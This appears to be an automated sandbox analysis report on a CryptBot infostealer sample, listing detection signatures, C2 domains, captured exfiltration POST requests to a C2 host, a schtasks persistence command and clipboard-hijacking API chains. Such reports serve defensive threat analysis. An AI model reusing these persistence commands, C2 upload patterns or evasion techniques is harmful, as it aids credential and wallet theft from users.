Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name: Set-up.exe
Analysis ID: 1522675
MD5: fb481c39ea41b8bd7743bf3a9d730e76
SHA1: 57fb93e92efa53e80fb196d5fbb3717783c54809
SHA256: ec23c516e7dcc1783530369419e6ce7333a228f4e5209216d70e8489048e3ab4
Tags: exeuser-4k95m
Infos:

Detection

Clipboard Hijacker, Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Cryptbot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops large PE files
Found evasive API chain (may stop execution after checking mutex)
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection
barindex
Found malware configuration
Source: Set-up.exe.4816.0.memstrmin Malware Configuration Extractor: Cryptbot {"C2 list": ["upload.phps.top", "s.top", "@twelvevx12vs.top", "+twelvevx12vs.top", "LRPCtwelvevx12vs.top", "twelvevx12vs.top", "analforeverlovyu.top"]}
Multi AV Scanner detection for domain / URL
Source: https://serviceupdate32.com/update Virustotal: Detection: 17% Perma Link
Multi AV Scanner detection for submitted file
Source: Set-up.exe ReversingLabs: Detection: 28%
Source: Set-up.exe Virustotal: Detection: 35% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_000115B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 5_2_000115B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3414B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 5_2_6C3414B0
Uses 32bit PE files
Source: Set-up.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: Set-up.exe Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea ecx, dword ptr [esp+04h] 5_2_000181E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C3BAEC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C3BAF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C3BAF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 5_2_6C360860
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 5_2_6C36A970
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 5_2_6C36A9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 5_2_6C36A9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C41F960h 5_2_6C35EB10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C364453
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 5_2_6C3E84A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 5_2_6C36C510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 5_2_6C36A580
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 5_2_6C36A5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 5_2_6C36A5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 5_2_6C36E6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 5_2_6C36E6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, ecx 5_2_6C3E0730
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 5_2_6C360740
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C3BC040
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C3BC1A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+04h] 5_2_6C39A1E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 5_2_6C360260
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [6C41D014h] 5_2_6C414360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C3BBD10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 5_2_6C3B7D10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 5_2_6C3B3840
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+04h] 5_2_6C36D974
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 5_2_6C399B60
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 5_2_6C37BBD7
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 5_2_6C37BBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C3BB4D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 5_2_6C36D504
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 5_2_6C3B9600
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] 5_2_6C36D674
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C41DFF4h 5_2_6C3B3690
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+08h] 5_2_6C36D7F4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 5_2_6C3E3140
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C35B1D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C36D2A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 5_2_6C3D7350

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:49704 -> 84.38.182.221:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:49706 -> 84.38.182.221:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:49712 -> 84.38.182.221:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: upload.phps.top
Source: Malware configuration extractor URLs: s.top
Source: Malware configuration extractor URLs: @twelvevx12vs.top
Source: Malware configuration extractor URLs: +twelvevx12vs.top
Source: Malware configuration extractor URLs: LRPCtwelvevx12vs.top
Source: Malware configuration extractor URLs: twelvevx12vs.top
Source: Malware configuration extractor URLs: analforeverlovyu.top
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 84.38.182.221 84.38.182.221
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SELECTELRU SELECTELRU
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary41476359User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: twelvevx12vs.top
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary68176922User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 75959Host: twelvevx12vs.top
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary70233283User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 30029Host: twelvevx12vs.top
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: twelvevx12vs.top
Source: unknown HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary41476359User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: twelvevx12vs.top
Source: Set-up.exe, Set-up.exe, 00000000.00000003.2185018616.0000000001968000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2185018616.0000000001978000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2425407959.0000000001968000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://twelvevx12vs.top/
Source: Set-up.exe, 00000000.00000003.2425407959.0000000001968000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://twelvevx12vs.top/?
Source: Set-up.exe, 00000000.00000003.2425407959.0000000001968000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://twelvevx12vs.top/G
Source: Set-up.exe, 00000000.00000003.2185018616.0000000001968000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2425407959.0000000001968000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://twelvevx12vs.top/O
Source: Set-up.exe, 00000000.00000003.2425407959.0000000001968000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://twelvevx12vs.top/d
Source: Set-up.exe, 00000000.00000003.2425407959.0000000001968000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://twelvevx12vs.top/v1/upload.php
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: UwGCIJbIlmBudMOlckMv.dll.0.dr String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: Set-up.exe String found in binary or memory: https://serviceupdate32.com/update
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C359C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 5_2_6C359C22
Contains functionality to modify clipboard data
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C359C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 5_2_6C359C22
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C359D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 5_2_6C359D11
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C359E27 GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 5_2_6C359E27

System Summary
barindex
Drops large PE files
Source: C:\Users\user\Desktop\Set-up.exe File dump: service123.exe.0.dr 314617856 Jump to dropped file
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_000151B0 5_2_000151B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_00013E20 5_2_00013E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C382CCE 5_2_6C382CCE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C34CD00 5_2_6C34CD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C34EE50 5_2_6C34EE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C350FC0 5_2_6C350FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C390AC0 5_2_6C390AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3544F0 5_2_6C3544F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3846E0 5_2_6C3846E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3807D0 5_2_6C3807D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3787C0 5_2_6C3787C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C390060 5_2_6C390060
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C382090 5_2_6C382090
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C372360 5_2_6C372360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C39DC70 5_2_6C39DC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C355880 5_2_6C355880
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3798F0 5_2_6C3798F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C387A20 5_2_6C387A20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C38DBEE 5_2_6C38DBEE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C38140E 5_2_6C38140E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C391510 5_2_6C391510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C38F610 5_2_6C38F610
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C36F760 5_2_6C36F760
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C343000 5_2_6C343000
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C4050D0 5_2_6C4050D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3570C0 5_2_6C3570C0
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C40ADB0 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C413820 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C4136E0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C413B20 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C415A70 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C413560 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C415980 appears 83 times
Sample file is different than original file name gathered from version info
Source: Set-up.exe, 00000000.00000002.2666887733.00000000019A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameschtasks.exej% vs Set-up.exe
Uses 32bit PE files
Source: Set-up.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@8/2@1/1
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\kLjWvVQjXk Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1888:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\fwFEVxyGBFjyQWNlspqq
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to behavior
Source: Set-up.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Set-up.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Set-up.exe, 00000000.00000003.2195576685.0000000003AB8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Set-up.exe ReversingLabs: Detection: 28%
Source: Set-up.exe Virustotal: Detection: 35%
Source: unknown Process created: C:\Users\user\Desktop\Set-up.exe "C:\Users\user\Desktop\Set-up.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe" Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: uwgcijbilmbudmolckmv.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: uwgcijbilmbudmolckmv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: uwgcijbilmbudmolckmv.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: Set-up.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: Set-up.exe Static file information: File size 9991168 > 1048576
Source: Set-up.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2c4a00
Source: Set-up.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x671000
Source: Set-up.exe Static PE information: DYNAMIC_BASE, NX_COMPAT
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_00018230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 5_2_00018230
PE file contains sections with non-standard names
Source: Set-up.exe Static PE information: section name: .eh_fram
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: UwGCIJbIlmBudMOlckMv.dll.0.dr Static PE information: section name: .eh_fram
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_0001A521 push es; iretd 5_2_0001A694
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3F0C30 push eax; mov dword ptr [esp], edi 5_2_6C3F0DAA
